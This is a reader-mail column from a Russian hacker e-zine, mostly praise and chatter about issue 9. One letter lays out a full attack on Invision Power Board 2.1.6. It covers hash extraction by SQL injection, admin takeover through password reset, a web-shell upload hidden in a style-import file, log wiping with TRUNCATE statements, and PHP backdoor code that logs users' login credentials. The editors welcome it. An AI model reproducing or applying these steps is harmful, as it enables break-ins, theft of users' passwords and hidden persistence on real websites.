по славной традиции, немного фидбека к нам оказывается пришло =)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: qw rt <[email protected]>
Тема: ВАЖНЫЙ ВОПРОС
Прив8 #дефейсд. Слухай скажи вы собираетесь 10ый нумбер делать #деф? У меня
просто материал есть хотел к вам кинуть, можно попробовать? ЖДУ ОТВЕТАА!!!!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ не дождались, на будущее - шли и не спрашивай. если будет номер то твой крео
туда вполне может попасть. ]


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: Tark <[email protected]>
Тема: 9 номер
Грустный вышел номер.. А жаль.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ не смешно, зато про жизнь ) ]


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: Д Д<[email protected]>
Тема: V0T!
Ели меня кто-то слышит кроме меня самого!  Мужики ну и депресуху вы
нагнали в 9-zine в статье  0x07 ><   choose life -> я увидел себя Ж)
да так оно и есть, все умерло все летит в 3.14зду, но не кажется вам
что после смерти чего то должно последовать возрождение на следующем
етапе еволюции? Много людей котрые просто пиздят ето следствие
вливания масс в темы которые они не понимают, но ведь дело делают лишь
единицы и вы относитесь к последним представителям настоящего
Undegraunda! А номер вобщем мне понравился как раз под настроение
полный депреСССр.
з.ы. ргр пользоваться могу пишу через веб
      дайте поковырять что нить и как буквы писать вроде еще не
разучился...
      надеюсь ето письмо не ушло в /dev/nul а вобщем какая разница
3.14здец я	   кончил.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ присылай если что-то будет, никуда мы пока не денемся ]


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: nekd0 <[email protected]>
Тема: zine
Здравствуйте, d3f4c3d.

спасибо за 9ый выпуск,ахуенный.стафф тоже ахуенный.отлично
потрудились.
отдельное спасибо за
	 04_static_lib_calls_hook
	 06_chose_life
	 07_death_industry
продолжайте в том же духе.
--
С уважением,
nekd0			       mailto:[email protected]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ всегда пожалуйста ) ]


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: <[email protected]>
Тема: ???

fds не умер. 9 issue - хорошая работа. Завязывайте с медведами и преведами.
btw, hihi ))
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ хыхы, ждём новых FDS номеров ]


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: nekd0 <[email protected]>
Тема: ???

на милворме до этого допёрли только недавно, и то, никто не догадался
обратно пасс админу поменять. так что впринципе это уже не приват. хотя
почитать интересно. скажите что думаете, я доработаю тут всё, пару кодов
напишу и заебись должно получиться.

-------------------------------------------------------------------------------
альтернативный способ без использования чужой сессии.
находим форум с ipb бажным. чтобы получить права админа нам надо :
1) получить и записать куданить данные из следующих колонок базы.
используется бага в 2.1.6. сплоит от рст.

[shot  1]

TEST FORUM ... FORUM VULNERABLE
MEMBER_LOGIN_KEY : 83666dcd7d57f61f94a7a57b674f405b (ibf_members ->
member_login_key)
CONVERGE_PASS_HASH : b53fa8d06dff6497e51691055bb8044e
(ibf_members_converge -> converge_pass_hash)
CONVERGE_PASS_SALT : "C^04 (ibf_members_converge -> converge_pass_salt)

[/shot 1]

запомнили всё это. приступаем к следующему шагу. смена пасса на админку
и заливание шелла.
для этого идём сюда http://localhost/index.php?act=Reg&CODE=10 .
востаннавливаем.
суть в том, что на мыло высылается код активации, который надо будет
потом ввести,
и соответственно этот код лежит и в БД. мы его оттуда аккуратно берём.
лежит в колонке vid записи ibf_validating.

(немного переписал сплоит)

[shot  2]

TEST FORUM ... FORUM VULNERABLE
VALIDATING_KEY : 86ce9be9800111e7b52c0020480e52ec   (вот этот ключ)
CONVERGE_PASS_HASH : b53fa8d06dff6497e51691055bb8044e
CONVERGE_PASS_SALT : "C^04
[/shot 2]

заходим сюда - http://127.0.0.1/index.php?act=Reg& … stpassform
палево только в том, что и на мыло админу эта хня отправиться тоже)
но это всё ерунда) пасс изменён. соответственно теперь мы можем зайти в
админку
с новым пассом. делаем shot 1 ещё раз.

[shot  1/2]

TEST FORUM ... FORUM VULNERABLE
MEMBER_LOGIN_KEY : 83666dcd7d57f61f94a7a57b674f405b
CONVERGE_PASS_HASH : e5c3da3791b26207d8e683cb245cb253
CONVERGE_PASS_SALT : "C^04

[/shot 1/2]

как мы видим login_key и pass_salt не изменились и это круто) меньше
менять потом придёца)

теперь надо залить шелл. это делается через достаточно корявый метод.
Идём на вкладку
Внешний Вид -> Импорт/Экспорт Стилей. Экспортируем например стиль
изображений.
Сейчас будем закачивать файлы через импорт изображений. Скачали мы
значит этот
стиль. Он представляет собой xml файл, в котором находиться контент
картинок закодированный
в base64. Следовательно нам надо закодировать и свой файл. Кодируем. Я
кодирую rst shell.
Вот что у меня получилось. Это уже нужно добавить в xml файл и закачать
его.

<file>
<filename>phorum.php</filename>
<content>
[здесь конент файла]
</content>
<path></path>
<binary>0</binary>
</file>

Теперь импортируем наш стиль. Импортировали. Теперь наш шелл можно найти
по адресу
http://127.0.0.1/style_images/2/phorum.php .
Хехе)) Теперь надо поменять пасс админу. То есть загнать в
converge_pass_hash
значение которое было раньше и всё тип топ).

UPDATE `ibf_members_converge` SET `converge_pass_hash` =
'b53fa8d06dff6497e51691055bb8044e' WHERE `converge_id` =1 LIMIT 1 ;

чистим логи админки :
truncate table `ibf_admin_sessions`;
truncate table `ibf_sessions`;
truncate table `ibf_admin_logs`;

всё гуд.
теперь надо оставить бекдор маленький. типа подменить коекакие файлы.
так. значит добавляем в sources/action_admin/login.php и
sources/action_public/login.php
строчку навроде этой

$real_is=fopen('style_images/1/logger.txt','a-');

$check_1=$this->ipsclass->input['UserName']; //action_public
$check_2=$this->ipsclass->input['PassWord'];

$check_1=$this->ipsclass->input['username']; //action_admin
$check_2=$this->ipsclass->input['password'];

$string=base64_encode("$check_1:$check_2");
fputs($real_is,$string);
fputs($real_is,"\n");
fclose($real_is);

и уже гут.
вот такие вот наброски по поводу `ipb 2.1.6 или как залить шелл, и т.д.`
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ ipb 2.1.6 немного старая версия =) да и бага не новая. Хотя кому-то может и
пригодится. Так или инчае спасибо за старания ) ]


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: nekd0 <[email protected]>
Тема: зайн "Ржавая Сеть"

rusty.mrtech.ru - интереснейший киберпанк зайн, в 2к6 вышел его 6ой
номер, оцените, зайн ахуительный.
--
nekd0.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ аминь =) ]